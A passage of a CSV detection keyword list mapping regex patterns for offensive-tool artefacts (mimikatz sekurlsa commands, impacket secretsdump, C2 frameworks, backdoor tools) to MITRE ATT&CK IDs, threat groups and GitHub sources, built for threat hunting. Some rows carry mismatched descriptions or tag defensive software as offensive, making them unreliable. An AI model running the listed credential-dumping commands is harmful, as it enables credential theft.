"*secrets/secrets_manager/secrets.txt*",".{0,1000}secrets\/secrets_manager\/secrets\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*secrets_dump*",".{0,1000}secrets_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*secrets_dump_dcsync*",".{0,1000}secrets_dump_dcsync.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*secretsdump *--silent*",".{0,1000}secretsdump\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*secretsdump -sam *",".{0,1000}secretsdump\s\-sam\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*secretsdump*",".{0,1000}secretsdump.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","7","600","145","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*secretsdump.*.pyc*",".{0,1000}secretsdump\..{0,1000}\.pyc.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*secretsdump.py*",".{0,1000}secretsdump\.py.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*secretsquirrel/the-backdoor-factory*",".{0,1000}secretsquirrel\/the\-backdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*SecScanC2_admin *",".{0,1000}SecScanC2_admin\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2_admin_*",".{0,1000}SecScanC2_admin_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2_node *",".{0,1000}SecScanC2_node\s.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2_node_*",".{0,1000}SecScanC2_node_.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*SecScanC2-main*",".{0,1000}SecScanC2\-main.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*sec-shinject *",".{0,1000}sec\-shinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*securesocketfunneling*",".{0,1000}securesocketfunneling.{0,1000}","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - ","N/A","N/A","POST Exploitation tools","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*security-onion*",".{0,1000}security\-onion.{0,1000}","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Infosec Operation system","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","10","3056","518","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z" "*securitywithoutborders*",".{0,1000}securitywithoutborders.{0,1000}","offensive_tool_keyword","Github Username","pentest documentations","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/securitywithoutborders","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SeeYouCM-Thief.git*",".{0,1000}SeeYouCM\-Thief\.git.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*SeeYouCM-Thief-main*",".{0,1000}SeeYouCM\-Thief\-main.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*sekurlsa *",".{0,1000}sekurlsa\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::backupkeys*",".{0,1000}sekurlsa\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::bootkey*",".{0,1000}sekurlsa\:\:bootkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::cloudap*",".{0,1000}sekurlsa\:\:cloudap.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::credman*",".{0,1000}sekurlsa\:\:credman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::dpapi*",".{0,1000}sekurlsa\:\:dpapi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::dpapisystem*",".{0,1000}sekurlsa\:\:dpapisystem.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::ekeys*",".{0,1000}sekurlsa\:\:ekeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::kerberos*",".{0,1000}sekurlsa\:\:kerberos.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::krbtgt*",".{0,1000}sekurlsa\:\:krbtgt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::livessp*",".{0,1000}sekurlsa\:\:livessp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::logonpasswords*",".{0,1000}sekurlsa\:\:logonpasswords.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::minidump*",".{0,1000}sekurlsa\:\:minidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::msv*",".{0,1000}sekurlsa\:\:msv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::process*",".{0,1000}sekurlsa\:\:process.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::pth*",".{0,1000}sekurlsa\:\:pth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::ssp*",".{0,1000}sekurlsa\:\:ssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 